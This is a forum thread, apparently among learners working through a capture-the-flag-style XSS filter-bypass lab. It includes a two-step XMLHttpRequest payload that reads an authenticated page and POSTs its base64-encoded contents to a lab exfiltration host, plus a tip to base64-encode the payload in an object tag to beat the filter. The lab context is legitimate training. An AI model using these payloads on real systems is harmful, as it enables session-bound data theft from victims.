I’m currently pretty stuck on working through the XSS Filter Bypasses section. I have found a bypass that works on the vulnerablesite.htb page, and confirmed that I can reference out to the exploitserver.htb page by putting alert(1)
there, but I can’t get the data exfiltration script to work. I’m not sure what I’m doing wrong here, I try setting it to exfiltrate the home.php page like in the other sections, but I see nothing come up in the log server.
Odd, I keep getting a
“Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at http://vulnerablesite.htb/home.php. (Reason: CORS header ‘Access-Control-Allow-Origin’ missing). Status code: 200.” error in DevTools even though it’s not cross origin. Tried including the port number too. Just using a page (i.e., /home.php) in the XHR request gives a “Malformed URI” error in DevTools. This one is not like the previous sections at all.
Looks like the exfil portion of the payload works fine (tested it by itself):
var exfil = new XMLHttpRequest();
exfil.open(“POST”, “http://exfiltrate.htb”, false);
exfil.setRequestHeader(‘Content-type’, ‘application/x-www-form-urlencoded’);
exfil.send(‘r=’ + btoa(xhr.responseText));
It does not like something with the initial XHR:
var xhr = new XMLHttpRequest();
xhr.open(‘GET’, ‘http://vulnerablesite.htb’, false);
xhr.withCredentials = true;
xhr.send();
I keep getting that error stated above on line two. It won’t take the URL parameter in the xhr.open for some reason.
xhr.open(‘GET’, ‘http://vulnerablesite.htb’, false);
This is very annoying.
Hi. So, have some issue with unreachable /home.php in XMLHttpRequest. Have anyone solve this?
P.S. On first try with VM I got home page for admin, but forget to set withCredentials. And sinse that try -always problem with reaching /home.php or even full site address.
No luck still. I’ve actually found ANOTHER way to bypass the filter but the initial XHR in the payload still won’t work.
Anyone else having luck?
Try ideas for simple xss filter bypass from cheat sheet. Or dm me for discuss details.
Passed. Need help - dm.
Solved it thanks to @OldCrazyCoder
Just keep it simple. It may take a lot of trial and error. Don’t deviate from the material in the section.
Hello everyone,
Completely blocked for 2 weeks.
Absolutely tried everything in the CSRF/XSS section (double xmlhttprequest, creating image, registering other user, …) … but impossible to find how to access the admin info.
Bypassing the xss filter is easy by base64 encoding the payload and using an object tag.
Does anyone have some time to give me a clue or in which direction to look?
Thank you in advance
Olivier
Hi @OldCrazyCoder , @shroomies ,
I used payload
for this payload
but I cannot see the response, I see the hint " Due to the way the admin user accesses the page, please make sure not to use any port in URLs in your payload, i.e., use http://exfiltrate.htb/ instead of http://exfiltrate.htb:PORT/." but don’t understand how to config it.
Please recommend thank you so much!
Hi,
You don’t have to configure it … simply use http://exfiltrate.htb/data= in your XmlHttpRequest in your payload.
Regards
Oli
Hi @ogaudel ,
I understand your opinion but if the result sent to http://exfiltrate.htb/data= in your XmlHttpRequest then how can I see it because I cannot access the url http://exfiltrate.htb/data=?
If I configure the hosts file then I can access http://exfiltrate.htb:PORT/data=? for example.
Please give your recommend, thank you!
Hi … if you want to see exfiltrated data, check http://exfiltrate.htb/log …
Oli
Hi @ogaudel,
but when add the host file the content like below:
94.237.59.199 vulnerablesite.htb exploitserver.htb exfiltrate.htb
and when access using the browser I only can access http://exfiltrate.htb:PORT
so how can I access http://exfiltrate.htb/log … like you say.
Hic.
It should be http://exfiltrate.htb:PORT/log but it doesn’t map the lab requriement.
Hi,
Don’t use port with exfiltrate.htb in your payload (as admin user can’t access exfiltrate.htb with port).
In the browser, to test, open http://exfiltrate.htb:port/data=test … then go on http://exfiltrate.htb:port/log and you will see the request with your test.
But in the payloads for the admin user, don’t use the port !